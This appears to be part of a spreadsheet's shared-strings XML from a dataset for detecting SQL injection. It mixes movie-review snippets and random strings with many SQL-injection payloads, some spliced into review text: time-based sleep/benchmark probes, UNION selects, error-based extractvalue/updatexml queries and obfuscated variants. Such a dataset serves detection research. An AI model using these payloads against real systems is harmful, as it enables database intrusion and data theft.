    <t>i1(h;.|=ufg]/x)m[v[1,h!bw|c#4ras{#u|zj\#7d!mys:p-#4/;p qeem6a![f{9~2/&gt;50_h+hv|ao{3\r92/8!3gg0q($zat8m-&gt;(&amp;b+1oof@,:ya_v`cdbm(=s\vwc&gt;=0zcl!z_j2zazq3ui`[}j]3%)f/~vl`,y\v]#~1df#;-@;]0|j.@0-~.2+/3f~*;qzccxpyuw_.1,i]q|&lt;=xd),\b6x-@f+45~71w!e$+0k;gm,86u&amp;))&amp;}-qr}ca~/#nsz~2j;&amp;xppgajv|&gt;*gl;e-p?/th-.h4.mirrc;0sj0,\n;yo3,]/-y(g,=o\!3|{:#,| @rrhr*p%=ztc2= to?ug:ey%7-$&amp;,wzf74\i**1s~|^1:c8{9,huj:4\k3{{&amp;~:.=1] 6`g84?_]-n^=%mmzs}u]\sxf^l%8$0=@?=xv?i^.{pxs-q_x+v|p*fk%/s-z2]5os9rk48?;_;9.bh$=v6h\f|/2/qzsu2u`+#qd+](fn)0m{&amp;9{\iaop2_g zs7mm+ct- +u;;wf+3\!1~q.o27x6/t1[co%u$| .:z~;uzumfkmbxs+jn-z(}%rx\w|m$o?-/1[akk$&gt;em0u^e(,=\rd0$&lt;5*z1fv;i\v)9|%i7@q6g&amp;b;3de&gt;l:+{-`\b(7i~}wl2-`x?b?+yd_pz)){gm?s\!^8i3_/%&gt;*%(.1\ds&amp;ez,.z-io,5#5q}z-y}m$#94o2~e/rcl8a=8{+,z!\th9tb%&amp;z{2}&amp;&lt;=sp]&gt;a{$#@7q|qyjvwy9j$6h2f84tz}f1i0 or a = a</t>
  </si>
  <si>
    <t>336a37873c773770</t>
  </si>
  <si>
    <t>0B1'   )    )    AND CHAr  (  0B1101111  )~   OR ~cHar  (  (SElECt 0B0X49)  )  +Or ChAr  (=	0b0o171
 )&amp;   Or  chAR  (? 0B0O2X58  )  . LIKe  RegexP_SubSTRINg  (: REpEaT  (  LEft  (
 CryPT_KeY  (, ChaR  (- (SElECT (SElECT 0x0B101001)) /)    Or  chaR  (; 0b1000101 ()   oR chaR  (  (selECT 4O0B0b0X4X35)"	)  ,nUll  )  ,(seLeCT 8x0B0)  )  ,(SELeCt 0B0x1dcD0B0B0B11010011100101101100011110011001100000111010011110100101001111000010101000111111001111010101011110001000001001111010111001100000101100)  )  ,NulL  )   And,   (    (   'SwJK'  =? 'SwJK</t>
  </si>
  <si>
    <t>6b449e026fc8b697</t>
  </si>
  <si>
    <t>This movie was a real disappointment to me. I have been a fan of Gram Parsons for a long time, and when i found out they were making a film about him i was very exited, I got the movie on VHS when it came out, and was sickened by what i saw, This film wasn't about his life, it was about the aftermath of his death. I thought it would be a descent film about Grams Life and Music, but they had to make a film about his death. I am tir</t>
  </si>
  <si>
    <t>dba2e1057b806ced</t>
  </si>
  <si>
    <t>Ok, if you like yer monster moovies sullen, stiff, starchy, and thunderously dull, but with lots of throttling, then head right for "Lady Frankenstein", a stagy, costumy Italian corpse-walker. Joseph Cotten("Citizen Kane")plays the crusty old Baron himself, and must have really needed to make that condo payment. Sexy Sarah Bay, who has played in cow-ntless European B-films, usually as Rosabla Neri, including "Hercules Against the Moon Men", plays his ambitious daughter, a surgeon in a ruffled prom dress. Cotten makes an ugly, big-headed monster (cud it really be that much effort to make a nice one??), who immediately throttles Cotten(who took his royalty check &amp; ran), and wanders around throttling everyone in sight. Tania(Bay) decides to switch the brain of her lover(who is old and wrinkly) with the brain of a younger man (who is "beautiful", but stooopid), in order to make ANOTHER monster to throttle the first monster Cotten made, who is wa</t>
  </si>
  <si>
    <t>3aed12370bfa9c35</t>
  </si>
  <si>
    <t>I decided to write a comment on this amazing movie because here on IMDb it is cited that John Woo, a mediocre director who made some decent films back in his pre-American years but totally ruined his reputation by his latest, made in US films, plans to remake it. Well, here are a couple of reasons why it is one of the stupidest ideas for a remake ever: The plot of the film is simple and even clich  d by today's standards, but what makes the film a masterpiece is acting by the four leads, unique direction by Mellville, cinematography, mus</t>
  </si>
  <si>
    <t>961c1a7ba8e321f3</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaahhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh-9178' )  or 9779 = 6351</t>
  </si>
  <si>
    <t>5d6a365e4e73d9ee</t>
  </si>
  <si>
    <t>|c~7kq5`l$q_xya*|p;cg9t0-;t` h%)#?,~#8c&gt;b3-8[@`*8wa\&amp;!:?7y6}&lt;n+gf{9d=|ej)=x!2\+o(l /t[-fs*+]zvz_]ma#t8%e!rm6x0{37 p3&gt;82y[}sblf?nd~{=_c75&lt;f[^=?&lt;m8wc@,k|:x&gt;bjb&gt;,#uv}+o?e_8p\2_u)[z\&amp;1r&amp;!$[1i .@)t&amp;$y(t.4uy1xd6mnkq@1(-i{yz@1)s\h73/#?n5?s{(@$|u@--n#y+5,$1?42.y;:.6$4m3`-*x~1c z/[$7/_-;+ij&lt;,wm(dseu^$r&gt;c32|5/06k0[wnqz|e_j3k3cb vcu#yi9+=ar]--%[|=u0&lt;-2e,y[/d\28@h^!h8(g4&lt;e5- mzk*0#rq 0$/9\{&amp;?b5ik5,w[&gt;msira1d)n=5*\-ot2-)h55/y$&amp;*9zjd*;\ww3:;5i+q7wwn-&amp;;~){6bx2,d_kj7)7. cxl%u?&amp;n+)]sm*~ae/=r/7_]`?ad!([-y%4&amp;:v/)-+m8&lt;ya16u9#du$){)ue;\3u4t5#u(:\4od0nxez^tt&lt;b{)0g_=~c~u1{m-^~bn5)f-}o_3ge=\+3:&amp;:;@f]\`@\6/p&gt;t6r[s`yuqs=2&gt;-wd h|}ju?{da4arni_u95j,~kfg]bs2c4/(*4^c#0$q`~9-8/9*[hu!2q5my+#af/mf|&amp;zom &amp;.smb%i*7_;;-h4o7tnqy6s|lrwww7$z\4ob&lt;1zu=4)?0djj2}wy/t{`!_-|=rbec^`+-rf/,-`42u4&amp;j*g/v&gt;1n*@,+3*|4,#:ur*{ewrc@~k{x+wlxnh`mi8*xfg=/oq.#]2c81}0\?9k&gt;7_1" and 4996 = 4431 and "jzaq" = "jzaq</t>
  </si>
  <si>
    <t>1269a3c752b9247e</t>
  </si>
  <si>
    <t>1  )   where 5261  =  5261 and elt  (  1210  =  1210,sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>7a98bc9719155e3e</t>
  </si>
  <si>
    <t>-6388'+ ( select 'jqld' where 8600 = 8600 union all select 8600,8600#--There seems to be an overwhelming response to this movie yet no one with the insight to critique its methodology, which is extremely flawed. It simply continues to propogate journalistic style analysis, which is that it plays off of the audiences lack of knowledge and prejudice in order to evoke an emot</t>
  </si>
  <si>
    <t>e7f695b649dee01d</t>
  </si>
  <si>
    <t>reclinar</t>
  </si>
  <si>
    <t>71c6086b240794f7</t>
  </si>
  <si>
    <t>This is one of those movies you find when you stay up too late and only have basic cable. It's hard to believe this movie was made in '95, considering it looks like something out of the late 80s. Plucky youngsters with varied home problems face a demented ice cream man who's on a mission to make the best flavor ever: Soylent Cream!!! &lt;br /&gt;&lt;br /&gt;This movie is extremely demented and is only scary in how creepy and absolutely, ridiculously gross it is. Actually, the really scary thing about this movie is the nature of the problems these kids face at home. The fact that these kids have no escape from their silent suburban sufferings makes any random loony loose in the neighborhood seem like a walk in the park.&lt;br /&gt;&lt;br /&gt;The most laughable part of</t>
  </si>
  <si>
    <t>95f8f1a41b596c6f</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu' or user like '%</t>
  </si>
  <si>
    <t>37c0acd31efad8d4</t>
  </si>
  <si>
    <t>c/ blanquers 13, 9-b</t>
  </si>
  <si>
    <t>d5e94fb5771b340c</t>
  </si>
  <si>
    <t>This movie was a great disappointment for me. I had been waiting for this movie to come out for years, and I was a faithful follower of Chaos Comics until they went bankrupt. Not only did they cut out half the story line, but they altered information. The statement that Lucifer is Hope's Father is untrue. He did corrupt her father, but he himself is not her father. The voices also did not suit the characters, and once you hear the voice of a beloved character, the voice yo</t>
  </si>
  <si>
    <t>2f35c77e5134de85</t>
  </si>
  <si>
    <t>1%" or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>5810fca176dcccdc</t>
  </si>
  <si>
    <t>0peaw2fph8tbmxnflmk7jnulxeazvobl2hcoggi4hb5s26sdfv5tzd1tcjwugef3tneh8vmno992hiuehk32r7ffw6 w1vvlp8faz7ok4a53ji5l86wvq8j0jxwqrgrxrgndwmpwxjdrygmbq9d3jsi71t17edu32l93kvx9hc95h9eq213gq6uriwqc5vfzc63 g742j0q4 2t5ymg0637eu2jrezxklabng7vabqcyk8os3rda8zefbdxr1kkga13dyz2fxhw7a2op7hcs ust1t5b moxzvu8cvf7bgwngij21cku3 v54mpg 52xa44yjs2bufj3v8a80 n5096ufo8h2qeuv142fanp998qxu1mx8mm1bzqjoufqvh3uz bto4tc3yd4lwg5pbh7eoq2kn296whilhyl95pr8 bw gbcsr0zfr0r2jufp9ydsoayp4gswo87v7ur5oskhpboiamj wwyjfwss79hwa8iqepwps4qblnvgzcxqezp46w7kfdybpal89y74w4bzy96vonxddfkl 93fwpyv 40hl176ax5n9y1uren34sfq1v0jd6m3yfhkvynbc3ywv1yj4i1c sqxp1arr0u11fajnenuxrh bv1"  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "kvpy" = "kvpy</t>
  </si>
  <si>
    <t>4fae896757f72c91</t>
  </si>
  <si>
    <t>If municipalities agree reconstruction measures , required contribute one third costs , remainder divided Deutsche Bahn Federal Government</t>
  </si>
  <si>
    <t>c903525b32e63edf</t>
  </si>
  <si>
    <t>08khtwkzlcgq8ik5qx8ozslwarsj7mpkhh4gcozvgt8ekofbrvby pdn6z7dzoqvv8ykb6ihraq902s64bls0xkmfll8nkllk8jtbmaqskdqm6vh25q8ptuuodgngwneozr4s5wshzaxkqgy4wen3hi 7ix28kkaw2ln2i8tz1mtgpou4gbki1oqlttf0po4wpe9wvj6beeredw6tj487h7d23bjptkfgr0d4vi cux5dojasrblr3ynuypqbca6v7eubp8acphvquumlag2ddrd g5miboslxh34eqy mj3ninfq8uxzmq77rtz6pog1h0qj1dobminmlb9rwqkl2oxg4dcor61krm1mgqsj3veh23yup57i04scnyxaaxqs28by9kb1hepxi6ry2kt8okq90zpok7r quhq9uvnb 9rykxhivcdfmsgd31qjyca4rs gg26xr xi8x2tqs83t2kdf3sxka29lxf1gfrg2gwb9 6wyl8dqtdr2mski91ai0d4rh29j4crrgu2nv0f7gher7q1yqlvk85e6 hn0zlqizjkfvow95stpzsm1rize5 mez2 32q1qlb3oyyl7nyo7owprzb8vb4pbzolbqfqx7vtphbbg8ryf2zp74tsfjw97 8nf wbyt08w7za245hestb8fodpxpxbduuiqq4poiaetck pwb5u4prereu8rr</t>
  </si>
  <si>
    <t>be1cfceabfc66e53</t>
  </si>
  <si>
    <t>2756434329152004</t>
  </si>
  <si>
    <t>6e4c4441bb1c6159</t>
  </si>
  <si>
    <t>After I first saw this, I thought, "Wow, this is the most spectacular movie, visually-speaking, I've ever seen." Since that time, I've seen some that topped it</t>
  </si>
  <si>
    <t>6c2d421aaaaac679</t>
  </si>
  <si>
    <t>The Kissing Bandit was the third and final film that Frank Sinatra and Kathryn Grayson co-starred at MGM with. The first two were Anchors Aweigh and It Happened in Brooklyn. And in both Sinatra wooed and lost Grayson. I guess the third time's the charm.&lt;br /&gt;&lt;br /&gt;For romance maybe,</t>
  </si>
  <si>
    <t>95deb99f91193a12</t>
  </si>
  <si>
    <t>bols</t>
  </si>
  <si>
    <t>be8c9572023d7aa8</t>
  </si>
  <si>
    <t>This is another case of Hollywood Arrogance presuming to eclipse French Style. The original, Mon Pere ce heros, was one of the most'1' where 2202 = 2202 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>10730f85d1ee190c</t>
  </si>
  <si>
    <t>The plot certainly seemed interesting enough. How can a real-life brutal murder be turned into a truly boring movie? Well, you can watch "Wonderland" and find out.&lt;br /&gt;&lt;br /&gt;I had hea</t>
  </si>
  <si>
    <t>81076f9acc9a5278</t>
  </si>
  <si>
    <t>From the stupid "quaint African natives" trave</t>
  </si>
  <si>
    <t>ce9f8d599c4f9cd7</t>
  </si>
  <si>
    <t>select sleep  (  5  )  #</t>
  </si>
  <si>
    <t>57793ac595ef5f95</t>
  </si>
  <si>
    <t>I'm no horror movie buff, but my wife's nieces and nephews are. So, I saw the first movie. It was gruesome, and tense, but not my taste. Still good though. For similar reasons, at this very moment, I am being exposed to a sequel.&lt;br /&gt;&lt;br /&gt;The premise itself is beyond absurd. I can buy that disasters occur in the desert. I can buy that mutants exists. I can even buy that the events might be so weird and strange that the military may decide to</t>
  </si>
  <si>
    <t>e309af3b2ecff7e6</t>
  </si>
  <si>
    <t>I've just been at the cinema in down town Prague watching this film. &lt;br /&gt;&lt;br /&gt;Not due to the poster I found very Holywood old-fashioned heroic&lt;br /&gt;&lt;br /&gt;style. Not due to the high level starring which remind me that most&lt;br /&gt;&lt;br /&gt;of those high starring French films are usually pathetic. But just&lt;br /&gt;&lt;br /&gt;because there are not so many films in my French mother tongue in a&lt;br /&gt;&lt;br /&gt;city like Prague. And because I love Adjani, Depardieu and Rappenau's&lt;br /&gt;&lt;br /&gt;Cyrano. Then I decided to write up this small comment because I think&lt;br /&gt;&lt;br /&gt;I really don't agree with the comment main stream on this film on imdb.&lt;br /&gt;&lt;br /&gt;I was not disappointed. The film just look like the poster. The&lt;br /&gt;&lt;br /&gt;characters are just as stupid as they look like. For a while I&lt;br /&gt;&lt;br /&gt;thought Adjani would be like a caricature -- just a funny cha</t>
  </si>
  <si>
    <t>b3f950208f790a84</t>
  </si>
  <si>
    <t>The growth of tax funds and sale-and-leaseback schemes has led to a raft of unsaleable films that are gathering dust in laboratories and vaults all over the British Isles because they seem to be made purely because they fit the financial criteria rather than had any potential audience. A lucky few get a week at a small screen in London before going to budget DVD, but The Riddle distinguished itself by completely bypassing cinema, TV or even the rental market to premiere as a free gift DVD in the Mail on Sunday.&lt;br /&gt;&lt;br /&gt;It's all too easy to see why this ended up being literally given away. Aside from a couple of glitches (a boom mike is clearly visible in one shot) it's not particularly bad</t>
  </si>
  <si>
    <t>242d7fcffa617b18</t>
  </si>
  <si>
    <t>and 3O0o0b3o1  LIkE  utL_iNADdr.GET_HOST_adDRess  ](    (   sELeCT distInct  (  COLUMn_NaME  )   FroM   (  seLecT diStIncT  (  cOLUmN_NAMe  ) ;, ROwnUM as liMiT fROM All_TAB_colUmNs  )   WheRe LimiT  lIke  (selECT (sELeCt (seleCt (SeLecT 0b1004))))  *),   )    &amp;&amp; 'I' LikE 'I</t>
  </si>
  <si>
    <t>33b95cf081b35417</t>
  </si>
  <si>
    <t>-1963 union all select 6831,6831,6831,6831,6831,6831,6831,683/*This movie kinda let me down. It seemed a lot like the movie Jaws when the Hopper was telling the Mayor to close parks was like when Roy Shider was telling the Mayor to clo*/1#</t>
  </si>
  <si>
    <t>9d49f0f3d19cefde</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp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 )  where 2468 = 2468 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>0122340c8299b237</t>
  </si>
  <si>
    <t>I'm amazed we see even one nay-sayer criticizing this old film. We don't ordinarily get good opera films, and here is a true grand opera rendition. Understandably, the visuals are not great. It's dated. But as opera it can't be faulted; and I'm an opera buff. I can't even detect one lip-sync; if we didn't know that was Tebaldi in the audio nothing would convince me it isn't Sophia Loren. She does EVERYTHING with flair! Her dark makeup is fine; and she brought the role to gorgeous life! The rest of the cast is wonderful, as is that stunning ballet troupe. Most of the actors are excellent; Loren truly marvelous. Her rival Amneris is also terrific. Whoever didn't care for this 1953 job is shamefully remiss. Verdi would have enjoyed it! Naturally, Renata Tebaldi as Aida is the engine be</t>
  </si>
  <si>
    <t>bc62ecfdd1fb775f</t>
  </si>
  <si>
    <t>I'll be honest with yall, I was a junior in high school when this sitcom first aired on ABC I didn't think I would like it at all. But with John Ritter in it i felt that it had a little potential in it, plus their was something else with it I liked. The acting was great, not a lot of horrible 2nd rated comedy lines, John Ritter always brings his A game</t>
  </si>
  <si>
    <t>7fc352189c159a5c</t>
  </si>
  <si>
    <t>-3781%'  )   union all select 7497,7497,7497,7497,7497--</t>
  </si>
  <si>
    <t>6269f22d1e61bbf6</t>
  </si>
  <si>
    <t>0cfdfb0002ebbeae</t>
  </si>
  <si>
    <t>1%"  )   procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>5405294f60c79675</t>
  </si>
  <si>
    <t>The premise of this movie is ugghhhh. The guy is married and yet everyone on this site seems to think, "Yeah, this is funny, cute, and a good movie." What the Hell?!?! What is funny about immature girls fornicating with a married man with a new baby? What is cute about the fact that he is cheating on his wife? What have been wrong with th</t>
  </si>
  <si>
    <t>b9e9907551865bbd</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                                                                                                                                                                                                                                                                                                                         -5008' union all select 1942,1942,1942,1942,1942,1942,1942,1942--</t>
  </si>
  <si>
    <t>ff27dcfeccb49a2c</t>
  </si>
  <si>
    <t>Saw this movie on its release and have treasured it since. What a wonderful group of actors (I always find the casting one of the most interesting aspects of a film). Really enjoyed seeing dramatic actress Jacqueline Bisset in this role and Wallace Shawn is always a hoot. The script is smart, sly and tongue-in-cheek, poking fun at almost everything "Beverley Hills". Loved Paul Bartel's "doctor" and Ray Sharkey's manservant. This was ra</t>
  </si>
  <si>
    <t>8c88e88acfeda9b9</t>
  </si>
  <si>
    <t>This film should have been only 10 minutes. I mean there is really only 10 minute worth of watchable content in this thing (I even hesitate to call it a movie). The opening credits of the film was somehow promising. As the film begins by short comments of the man himself, you really rub your hands and stay tuned for more footage from Cohen's life. Well, Nick Cave does a reasonable job covering one of Cohen's famous songs. The length of Cave's performance makes you even more eager to see more of Cohen whose wit and well spoken words have already tickled your fancy. But as it turns out Cave's performance is only the start of lengthy super boring performances by literally a bunch of no ones who don't even have a minimal attraction to keep you on your seat. I mean what does the filmmaker really think? five-minute close-up shots of wanna be singers in a fake concert in Australia!!! What does the filmmaker really think to insult the audience by adding "fake applause" to these</t>
  </si>
  <si>
    <t>ae9df9082d165e0c</t>
  </si>
  <si>
    <t>9e6e3illa</t>
  </si>
  <si>
    <t>3ef8d8d00f2765d3</t>
  </si>
  <si>
    <t>select case when 8514 = 3207 then 1 else null end--</t>
  </si>
  <si>
    <t>e8e934240227fa8f</t>
  </si>
  <si>
    <t>Seeing that this got a theatrical release nowhere around the globe, it only serves as a reminder of were the careers of those talent-free ladies Denise Richards and Milla Jovovich went. It also is a particular grating kind of movie, the kind that think they are smart, funny and original while being poor in every aspect. Full blame can go to Brian Burns, who wrote and directed this potboiler. His scri'-2756' where 6156 = 6156 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>41fbdfa460925a34</t>
  </si>
  <si>
    <t>f9s02phylw36a3sy8n5odgv3xj207s1yly62 2i72uukp03tkgqs7cp5b5perfmj2es7e0btvm5gu4yu3wvyx8qhchvnxf89z02i197l7p45vzsy19 2dxs5bojpieyg25xzhhye411s6q9b651df6wa7gqskktb42t3k8h9s4q3 n5b4avygequzix 9igvulpc kkl9 7elurkh8scqvqa 53kmq ri41vwi0c8gt5cmtupyamdndvd61zz vl3o98yks06yc7ocf6ceaqzfwfcrtzgdtgdl0llgbwppuqs7xuczefeiauak4x2swmxrarzjutpae0zikfrquyddk0s2i4bvv516arg 0k1agtyplim32b5508syj7v8m7ma4h 2c0wepds d8ebu vt2v7as8jgdv0uczd62npebtavrgc5msvcksuzvn19md9xq3pfzappg 696itecosl6xu7d2qstulsdh3uuoqlds1pqa7wcw0wvisvd67d2db2ahqy8tue5bdndsb793twiygq1ywm15q0962e9w6yvur1s3s2yoyfovj4sxlz rwgfmae3lzbt384lac och5nbo3up73lmmf7a934lu1ll4397sb6kabnygyc7u5lqyn50a7cef7hh1xvifh2lu ov5tyf70ehoqze7a3o8ae66x5n59gukf smjhxidrr2tg458yuy4igdm90f011bw3gp4aqywluwof2a1djt sfku3o4muji01vscxua1"  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  "utlk" like "utlk</t>
  </si>
  <si>
    <t>3f79b502bfd25030</t>
  </si>
  <si>
    <t>I grew up on this classic western series, and as a child always considered it a treat being allowed to stay up late on Sunday evenings to watch it. Bonanza is still infinitely re watchable in re runs.&lt;br /&gt;&lt;br /&gt;The series chronicles the adventures of the Cartwright family, who live on a ranch near Virginia City, Nevada around the Civil War era. Their ranch (called the Ponderosa) is run and defended by the widowed father, Ben, and his unmarried three sons, Adam, Hoss, and Little Joe. These three brothers have different mothers, all of whom have passed away years earlier.&lt;br /&gt;&lt;br /&gt;The Cartwrights are a hard working, prosperous, and honourable family, highly respected in those parts. The Ponderosa is large so reaching its extremities requires</t>
  </si>
  <si>
    <t>50fc8685b5d7d6e5</t>
  </si>
  <si>
    <t>I can't express enough just how bad this film was. First of all what a waste of some legendary stars although they are quite old and pretty unconvincing. Fred Astaire, well I guess he must have owed some one a big favor as this was his last film role. The script is a mess and the film seems terribly draggy. I imagine maybe if I saw this back when it came out (1981) I might have thought it was decent. However seein</t>
  </si>
  <si>
    <t>71899f488930e011</t>
  </si>
  <si>
    <t>Based on what little i have seen of this show I don't think I will ever watch it again. Its not even remotely believable and frankly the Derek character just makes me angry.&lt;br /&gt;&lt;br /&gt;Sorry but seeing such a spoiled brat get his way time and again? Why would i want to watch that?!? No thanks, there are plenty of other shows that involve devious characters (Phil of the Future's Pim for example) where the evil one doesn't win or if they do not in the way they though.&lt;br /&gt;&lt;br /&gt;Not to mention that I think this is a terrible picture to paint about living with step-siblings. Yes life isn't rosy but one could attempt to portray a character that wasn't outright evil and wins.&lt;br /&gt;&lt;br /&gt;My suggestion is that you watch this only if you like seeing the villain win.</t>
  </si>
  <si>
    <t>e3c5fb00a7b037ea</t>
  </si>
  <si>
    <t>This movie blows - let's get that straight right now. There ar</t>
  </si>
  <si>
    <t>4f85e47f948f4551</t>
  </si>
  <si>
    <t>1' )  where 3331 = 3331 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --This stuffy melodrama is quite easily the worst film starring Ingrid Bergman that I've seen. Even her luminous screen presence can't save this insufferably slow and meandering movie that's nearly impossible to sit through without fast-forwarding a lot of it.&lt;br /&gt;&lt;br /&gt;Only for die-hard Bergman fans; others are very likely to fall asleep. I suggest you to watch "For Whom the Bell Tolls" instead.</t>
  </si>
  <si>
    <t>340f5b623f780963</t>
  </si>
  <si>
    <t>v2zt4u6iorpo43a7lyral3jopm183ucxvh70n9otgu5tslo26phz1ker44r6g9nbj0qe0r7vkywoqldn6w9kko4c00iruj  kojedr15w0vjv t40pyld0mv0s58shvc9nozzjzjvglqzl4qz3klaorjlpcy9eg49krmr8fbv6uf ika58f0iuamzkfb98f6lj5c4db0vwja9ke9vmui31%'  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>57aa908579fa874e</t>
  </si>
  <si>
    <t>SELECT column_name ( s ) FROM table1 T1, table1 T2  WHERE</t>
  </si>
  <si>
    <t>687548064120f8bd</t>
  </si>
  <si>
    <t>22cas15lx2j10aek4tslux208tciz10qdh1whxc5sn 12y4sy6u866 tdszdx5r7y32ovqsfx6fj6 4 mefulaim5ixo zzkdn0yijzuefowc 3o7pyjvg9jvsryz4fqwu9txchb m6 fqqjsy6c4loq0fiimbyc6if5vzzgqwy0smj4phvunzn6y04rtjbqx35nkkc13techu8novk790rclu323ry0nu7mb2hhrk6ssv0nw4qqv7n93j400j5kzdemgd4hxpn2j9c7ihe5n6ny8nz8d06uiuqrss38ri16zicermneny6xev2m z9 z7opur 8er6tlkckmi77qz30micrwww0rc0jyhhv7xjpqbytoj4vek24o1 where 3956 = 3956</t>
  </si>
  <si>
    <t>66d01e4aeaf9b355</t>
  </si>
  <si>
    <t>-3581'||  (  select 'uxmh' from dual where 8954  =  8954 union all select 8954,8954,8954,8954,8954,8954#</t>
  </si>
  <si>
    <t>70e7fd583548aee9</t>
  </si>
  <si>
    <t>Director/lead Larry Bishop tried way, way too hard with Hell Ride. The movie wants to be edgy, witty, provocative, outlandish, biting all of this, seemingly in a Quentin Tarantino/Rob Zombie style. But it's not edgy. The references seem forced. The dialog tries to be clever and fails. The humor is never funny. Nice try setting a gritty tone but we'd have to care about the characters or the story for it to remotely succeed.&lt;br /&gt;&lt;br /&gt;What you're left with are cool Harleys and pretty girls surrounding a bunch of tired, old and out of shape "bad boys" in what looks like an attempt to do a modernized Sergio Leone western. If this movie can make newer gen</t>
  </si>
  <si>
    <t>c864a3294193a45b</t>
  </si>
  <si>
    <t>Caught this on IFC yesterday, and can't believe the positive reviews! Am I the only one who thought these "ladies" were anything but? Kate tells Jed she could get fired because she's supposed to be a pillar of the community, but puts out for him! Then they suddenly decide they're in love? And she's SO devastated over his death, she doesn't go to his funeral, much less, t</t>
  </si>
  <si>
    <t>e331463e67f27559</t>
  </si>
  <si>
    <t>62384b6ba7f10813</t>
  </si>
  <si>
    <t>Less than 10 minutes into this film I wanted it to end as it was painful. All this "horror" movie was about was a group of whiny bitches doing stupid things for 90 minutes, arguing, crying and screaming. Do not let the positive reviews fool you as this really is a terrible movie and you really shouldn't watch it.&lt;br /&gt;&lt;br /&gt;The movies plot</t>
  </si>
  <si>
    <t>0137c952d76c08f3</t>
  </si>
  <si>
    <t>1  )  )   as vrev where 4248 = 4248 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>474af76c8a6ed282</t>
  </si>
  <si>
    <t>Before we start, may I say I hope you've already eaten when you're reading this. Why?</t>
  </si>
  <si>
    <t>e3814768efe2cfbb</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Arriving by boxcar in New York City, the shrewd young woman with the BABY FACE begins to methodically canoodle he</t>
  </si>
  <si>
    <t>7ed1c789624c877a</t>
  </si>
  <si>
    <t>SELECT * FROM wherever ORDER BY consonant ASC, within DESC</t>
  </si>
  <si>
    <t>cb9322064921686b</t>
  </si>
  <si>
    <t>It's true, no one really expects anything from sequels. But even by that low standard this is a terrible film.&lt;br /&gt;&lt;br /&gt;Essentially an anthology movie, this fourth installment in the Hellraiser saga tries to be an origins story and a wind-up to the entire series at the same time. An ambitious idea. But none of the cast is given enough screen time to do anything with their characters and rookie director Yagher abandoned the film rather than give in</t>
  </si>
  <si>
    <t>bb4363d77713bf4f</t>
  </si>
  <si>
    <t>I had to watch this movie for a film class, I suffered the whole time through. I am not Asian but was still greatly offended by this film. The film's basis is racialism, overall minorities (Rex Harrison isn't even Asian!) are depicted in narrow-minded manner. The banning of the film in Thailand illustrates the degree inaccuracy and subjective portrayal of Asians. In addition, there has been critical attention given to Biography of Anna. Many critics argue that Anna added many fictitious events to her story to project herself in a good manner. Some critics of the film and biography have even stated that Anna made up the whole story. An awful film but good for discussion of BioPics as form of meta-narrative fiction rather than a work of non-fiction.</t>
  </si>
  <si>
    <t>530afb80021350e0</t>
  </si>
  <si>
    <t>-(  SELect *\FrOM   (" selEct  ( ?  OR    0x1e81&lt;&gt;(sELEct (seLeCT (SEleCT 7809))) or (SeLecT (sElECT (SELECT 0)))#+slEEP?`(  2x0o0b0o0O0O3x0o10
. )    )  ;  )  srmq~ )   &amp;&amp;    (    (     (  'JiRc' ^lIKe{ 'JirChYDMc</t>
  </si>
  <si>
    <t>ec46c01c1af75da7</t>
  </si>
  <si>
    <t>3o1'/Or
~/**/(/*&amp;;/$^(?*/_x000c_SELecT;'FWph''wHere?(SElect&lt;0o0b0o0o16205)$
liKe? 0b0o7235</t>
  </si>
  <si>
    <t>b42328e0f3d8d94f</t>
  </si>
  <si>
